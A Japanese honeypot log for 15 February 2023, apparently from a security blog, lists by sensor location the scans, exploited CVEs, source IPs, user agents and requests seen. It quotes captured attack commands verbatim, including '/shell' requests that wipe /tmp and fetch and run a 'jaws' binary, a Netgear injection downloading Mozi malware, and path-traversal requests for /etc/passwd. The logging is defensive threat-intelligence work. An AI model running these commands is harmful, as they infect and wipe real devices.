2023/02/15 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/02/15分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.cssへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 5.255.105.240/jaws;
sh /tmp/jaws

Location:UK

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

Location:SG

Joomla!の脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
curlによるスキャン行為
okhttpによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：107 (前日比：28)
US：総アクセス数：113 (前日比：26)
UK：総アクセス数：86 (前日比：-25)
SG：総アクセス数：653 (前日比：567)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.115.47.129	United States
3	20.117.133.181	United States
1	43.142.171.121	China
2	45.33.80.243	United States
1	47.97.5.102	China
1	51.159.152.255	France
1	61.52.199.62	China
3	64.227.186.157	United States
3	95.214.235.205	Ukraine
11	100.27.49.233	United States
3	101.32.209.199	Singapore
2	109.237.97.180	Russia
2	109.237.98.226	Russia
7	135.125.217.54	France
7	135.125.246.189	France
3	138.197.166.195	United States
18	139.162.214.192	Netherlands
4	143.244.50.172	United Kingdom
2	154.26.136.165	United States
1	162.243.147.23	United States
1	162.243.148.20	United States
1	162.243.152.28	United States
2	167.71.133.68	United States
1	167.94.138.47	United States
3	167.99.232.191	United States
1	167.248.133.119	United States
1	171.22.30.113	Bulgaria
2	172.104.11.34	United States
1	172.104.11.46	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
1	185.224.128.219	Netherlands
3	185.254.196.115	Ukraine
1	188.243.20.149	Russia
1	191.227.220.170	Brazil
1	192.241.213.66	United States
1	198.199.119.88	United States
1	205.210.31.10	United States
1	205.210.31.16	United States
1	209.141.48.150	United States
1	209.201.15.190	United States
1	216.218.206.66	United States
1	217.21.60.58	Belarus

UserAgent一覧

件数	UserAgent
30	`-`
18	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.100`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/604.1`
6	`Mozilla/5.0 zgrab/0.x`
2	`Weeb/2.0`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`HELP`
1		`MGLNDD_18.179.20.5_80\n`
2		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x02`
23		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
3	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
4	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
2	GET	`/login.cgi?cli=aa%20aa%27;wget%20http[:]//45[.]12[.]253[.]220/hugeanalenema.sh%20-O%20-%3E%20/tmp/weeaboo;sh%20/tmp/weeaboo%27$`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/metrics`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s/53e20323e2937313e28313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/v2/`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/yuuki?pp=env`	HTTP/1.1
3	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	20.204.31.142	United States
1	37.44.238.231	France
3	43.128.227.146	Singapore
1	45.62.170.16	United States
1	45.79.128.205	United States
1	45.79.181.104	United States
2	45.79.181.223	United States
1	45.95.55.150	Germany
1	45.134.140.181	United Kingdom
2	45.227.254.55	Belize
3	46.19.136.74	Panama
35	51.79.29.48	Canada
1	54.146.107.30	United States
1	64.62.197.91	United States
1	92.118.39.82	Romania
1	101.200.220.1	China
1	103.89.89.46	Vietnam
2	109.237.98.226	Russia
1	139.224.207.235	China
9	143.244.50.172	United Kingdom
6	152.89.196.211	Russia
2	154.26.136.165	United States
2	162.142.125.219	United States
2	167.94.138.46	United States
2	170.64.134.89	United States
2	172.104.11.4	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
2	172.104.11.51	United States
1	172.105.128.11	United States
2	183.136.225.32	China
1	185.180.143.79	Portugal
4	185.224.128.219	Netherlands
1	185.225.74.55	Bulgaria
2	192.155.90.118	United States
1	192.155.90.220	United States
1	198.199.95.36	United States
1	198.199.103.192	United States
1	198.199.103.199	United States
1	198.199.109.43	United States
1	198.235.24.147	United States
1	198.235.24.148	United States
2	209.141.48.150	United States
1	217.174.245.84	United Kingdom
1	223.83.101.94	China

UserAgent一覧

件数	UserAgent
29	`-`
3	`Go-http-client/1.1`
1	`Hello World`
2	`Hello, world`
1	`Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
9	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`
1	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
2	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x02`
17		`\x16\x03\x01`
1		`\xff\xa2\xff`
1		`o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f`
1	CONNECT	`ifconfig[.]me:443`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
9	GET	`/config/getuser?index=0`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/freepbx/recordings/theme/main.css`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/metrics`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]240/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/v2/`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	45.33.80.243	United States
2	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.95.55.150	Germany
2	45.227.254.55	Belize
29	51.79.29.48	Canada
1	90.135.222.78	Sweden
2	90.151.171.106	Russia
1	107.170.250.13	United States
1	114.229.117.219	China
2	139.59.37.187	Singapore
3	143.198.173.237	United States
7	143.244.50.172	United Kingdom
1	159.203.192.19	United States
2	162.142.125.121	United States
1	162.243.134.7	United States
1	162.243.134.22	United States
1	165.227.214.182	United States
2	167.94.146.59	United States
2	167.248.133.61	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
2	172.105.128.12	United States
1	172.105.128.13	United States
1	183.3.149.50	China
2	183.136.225.32	China
1	184.105.247.254	United States
3	185.224.128.219	Netherlands
1	192.155.90.220	United States
1	192.241.195.38	United States
1	194.87.151.116	Czechia
1	198.199.97.153	United States
1	198.235.24.53	United States
1	198.235.24.143	United States
1	209.141.48.150	United States
1	219.155.72.188	China

UserAgent一覧

件数	UserAgent
27	`-`
1	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
2	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
7	`Mozilla/5.0 zgrab/0.x`
1	`curl/7.58.0`
2	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x02`
17		`\x16\x03\x01`
1	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
1	CONNECT	`ifconfig[.]me:443`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
7	GET	`/config/getuser?index=0`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/freepbx/recordings/theme/main.css`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//219[.]155[.]72[.]188:53987/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`http[:]//checkip[.]amazonaws[.]com?Z72612114222Q1`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.55.53.144	United States
1	20.63.57.225	United States
2	20.115.47.129	United States
2	20.193.128.85	United States
1	36.110.214.194	China
1	36.110.214.195	China
3	36.156.28.133	China
1	40.113.161.9	United States
1	40.114.29.18	United States
2	45.9.110.186	Hong Kong
1	45.77.239.190	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
1	45.95.55.150	Germany
2	45.227.254.55	Belize
29	51.79.29.48	Canada
1	54.146.107.30	United States
1	64.62.197.209	United States
21	103.114.107.34	Vietnam
1	107.170.224.22	United States
8	143.244.50.172	United Kingdom
430	152.32.209.59	Hong Kong
102	159.89.166.147	United States
2	162.142.125.211	United States
1	162.243.146.32	United States
3	164.92.217.39	United States
2	167.172.89.248	United States
2	167.248.133.44	United States
3	170.64.178.32	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
2	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
2	183.136.225.32	China
1	185.132.53.119	Germany
1	185.180.143.138	Portugal
4	185.224.128.219	Netherlands
1	188.165.87.98	France
1	188.165.87.106	France
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.231.14	United States
1	198.199.114.181	United States
1	198.235.24.24	United States
1	198.235.24.139	United States
2	209.141.48.150	United States

UserAgent一覧

件数	UserAgent
26	`-`
1	`Go-http-client/1.1`
417	`Mozilla/5.0 (Linux; Android 11; vivo 1906; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.141 Mobile Safari/537.36 VivoBrowser/8.9.0.0`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36`
8	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50`
3	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
20	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:103.0) Gecko/20100101 Firefox/103.0`
2	`Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
6	`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
4	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
32	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
2	`Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
8	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
5	`Mozilla/5.0 zgrab/0.x`
1	`Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)`
1	`Wget/1.21`
1	`curl/7.29.0`
6	`okhttp/3.14.9`
3	`okhttp/3.3.1`
2	`python-requests/2.22.0`
2	`xx032_bo9vs83_2a`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
2		`\x16\x03\x01\x02`
19		`\x16\x03\x01`
1	CONNECT	`ifconfig[.]me:443`	HTTP/1.1
1	GET	`/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd`	HTTP/1.1
1	GET	`/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd`	HTTP/1.1
36	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`///bin///querybuilder[.]feed[.]servlet`	HTTP/1.1
1	GET	`/1-200611214053U8.jpg`	HTTP/1.1
1	GET	`/2015/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2016/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2017/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2018/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/202110/images/public.css`	HTTP/1.1
1	GET	`/6/`	HTTP/1.1
1	GET	`/9h/`	HTTP/1.1
1	GET	`/Application/Buy/Static/js/if.js`	HTTP/1.1
1	GET	`/Content/Wap/base.css`	HTTP/1.1
1	GET	`/Content/css/wzwstylel.css`	HTTP/1.1
1	GET	`/Content/favicon.ico`	HTTP/1.1
1	GET	`/Content/m_1/js/m_1_Jquery.js`	HTTP/1.1
1	GET	`/Css/Hm.css`	HTTP/1.1
